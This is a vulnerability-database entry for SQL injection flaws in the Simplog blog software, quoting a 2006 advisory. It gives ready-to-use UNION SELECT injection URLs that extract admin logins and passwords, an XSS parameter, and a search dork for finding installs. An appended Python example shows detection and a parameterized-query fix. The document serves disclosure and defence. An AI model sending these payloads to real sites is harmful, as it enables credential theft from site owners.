Multiple SQL injection vulnerabilities in Simplog

Vulnerability ID: 1197759    Vulnerability type: Input validation
Published: 2005-09-27    Updated: 2006-08-11
CVE ID: CVE-2005-3076    CNNVD ID: CNNVD-200509-275
Platform: N/A    CVSS score: 7.5
|Source
https://cxsecurity.com/issue/WLB-2006040079
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-275
|Details
Simplog lets you easily add blog functionality to an existing site. It is written in PHP, is compatible with most databases, and is designed to be both powerful and simple. Simplog 0.9.1 may contain a security vulnerability: a remote attacker could execute arbitrary SQL commands, or trigger SQL error messages, through invalid values in (1) the pid parameter of the archive.php script, (2) the blogid parameter, (3) the cid parameter, or (4) the m parameter or (5) the blogid parameter of the archive.php script.
|Exploit
--Security Report--
Advisory: Simplog <= 0.93 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 21/04/06 22:13 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: Simplog (http://www.simplog.org/)
Version: 0.93 and prior versions must be affected.
About: Via these methods a remote attacker can inject arbitrary SQL queries into the
tid parameter in preview.php, cid, pid and eid in archive.php, and pid in comments.php.
As you know, rgod published an advisory about version 0.92 but he did not notice
these SQL injections. He found other SQL injections in archive.php but did not find
these vulnerabilities.
Also there is a cross-site scripting vulnerability in imagelist.php's imagedir
parameter.
Level: Critical
---
How&Example: 
SQL Injection :
Needs MySQL > 4.0
GET -> http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&cid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&pid=[SQL]
GET -> http://[victim]/[simplogdir]/archive.php?blogid=1&eid=[SQL]
EXAMPLE ->
http://[victim]/[simplogdir]/preview.php?adm=tem&blogid=1&tid=-1/**/UNION/**/SELECT/**/concat(25552,login,25553,password,25554)/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&cid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/archive.php?blogid=1&eid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
EXAMPLE ->
http://[victim]/[simplogdir]/comments.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/*
With these examples a remote attacker can leak the specified admin's login
information from the database.

XSS:
GET ->
http://[victim]/[simplogdir]/imagelist.php?blogid=1&act=add_entry&login=1&imagedir=[XSS]
---
Timeline:
* 21/04/2006: Vulnerability found.
* 21/04/2006: Contacted vendor and waiting for reply.
---
Exploit:
http://www.nukedx.com/?getxpl=25
---
Dorks: "powered by simplog"
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=25
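Every injectable parameter the advisory names (tid, cid, pid, eid) is a record id that should only ever hold digits, and the published payloads hide their spaces behind /**/ comments. The following is an added example, not code from the advisory or from the Simplog project: it normalizes that obfuscation, flags non-integer id values in constructed access-log lines, and shows the hardened lookup (integer whitelist plus bound parameter) that removes the root cause. The blog_posts table and sqlite3 are an assumed stand-in for the application's real schema and database.

```python
"""Detection and prevention for the Simplog integer-parameter SQL injection.
Added example, not advisory or Simplog code. Log lines are constructed; the
sqlite3 blog_posts table is an assumed stand-in for the real schema."""
import re
import sqlite3
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Parameters the advisory names as injectable. All are record ids, so a
# fixed script should accept nothing but digits in them.
INT_PARAMS = {"tid", "cid", "pid", "eid", "blogid"}

# The published payloads use /**/ in place of spaces; strip SQL comments so
# obfuscated input compares like plain SQL.
_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
_UNION_RE = re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)
_REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def is_integer_param(value: str) -> bool:
    """Whitelist check: an id is an optional sign followed by digits only."""
    return re.fullmatch(r"-?\d+", value) is not None


def normalize(value: str) -> str:
    """Undo a second layer of URL-encoding, turn comments into spaces and
    collapse whitespace: 'UNION/**/SELECT' and 'UNION%20SELECT' both
    become 'UNION SELECT'."""
    decoded = unquote_plus(value)  # parse_qs already decoded once
    decoded = _COMMENT_RE.sub(" ", decoded)
    return re.sub(r"\s+", " ", decoded).strip()


def classify_request(path_and_query: str) -> dict:
    """Per id parameter, report values that fail the integer whitelist and
    whether the normalized value looks like a UNION-based injection."""
    findings = {}
    query = urlsplit(path_and_query).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in INT_PARAMS:
            continue
        for raw in values:
            if is_integer_param(raw):
                continue
            norm = normalize(raw)
            findings[name] = {
                "raw": raw,
                "normalized": norm,
                "union_select": _UNION_RE.search(norm) is not None,
            }
    return findings


def scan_log(text: str) -> list:
    """Run classify_request over each request line of an access log and
    return (line number, script path, findings) for every suspicious hit."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = _REQ_RE.search(line)
        if not match:
            continue
        findings = classify_request(match.group(1))
        if findings:
            alerts.append((lineno, match.group(1).split("?", 1)[0], findings))
    return alerts


def make_demo_db() -> sqlite3.Connection:
    """Assumed stand-in schema; not Simplog's real tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE blog_posts (pid INTEGER PRIMARY KEY, title TEXT);"
        "INSERT INTO blog_posts VALUES (42, 'hello world');"
    )
    return conn


def lookup_post_safely(conn: sqlite3.Connection, pid_raw: str):
    """Hardened lookup: validate the id, then bind it as a parameter instead
    of splicing request text into the SQL string."""
    if not is_integer_param(pid_raw):
        raise ValueError("pid must be an integer")
    row = conn.execute(
        "SELECT title FROM blog_posts WHERE pid = ?", (int(pid_raw),)
    ).fetchone()
    return row[0] if row else None


# Constructed access-log lines modelled on the advisory's URLs (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Apr/2006:22:13:01 +0000] "GET /simplog/archive.php?blogid=1&pid=42 HTTP/1.1" 200 5120
203.0.113.9 - - [21/Apr/2006:22:13:07 +0000] "GET /simplog/archive.php?blogid=1&pid=-1/**/UNION/**/SELECT/**/0,null,0,email,0,0,login,password,0,admin,0/**/from/**/blog_users/**/where/**/admin=1/* HTTP/1.1" 200 6400
203.0.113.9 - - [21/Apr/2006:22:13:09 +0000] "GET /simplog/preview.php?adm=tem&blogid=1&tid=-1%20UNION%20SELECT%20login,password%20from%20blog_users HTTP/1.1" 200 900
"""

if __name__ == "__main__":
    for lineno, script, findings in scan_log(SAMPLE_LOG):
        print(lineno, script, {k: v["normalized"] for k, v in findings.items()})
    print(lookup_post_safely(make_demo_db(), "42"))
```

Running the script flags log lines 2 and 3 (the /**/-obfuscated and the %20-encoded UNION payloads) and leaves the legitimate pid=42 request alone. The whitelist in is_integer_param is the primary fix: once an id must be digits, the UNION regex is only a detection aid for traffic that reached an unpatched install, not a blocklist to rely on.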
|References

Source: www.simplog.org
Link: http://www.simplog.org/bugs/bug.php?op=show&bugid=55
Source: BID
Name: 14897
Link: http://www.securityfocus.com/bid/14897
Source: SECUNIA
Name: 16881
Link: http://secunia.com/advisories/16881
Source: SREASON
Name: 755
Link: http://securityreason.com/securityalert/755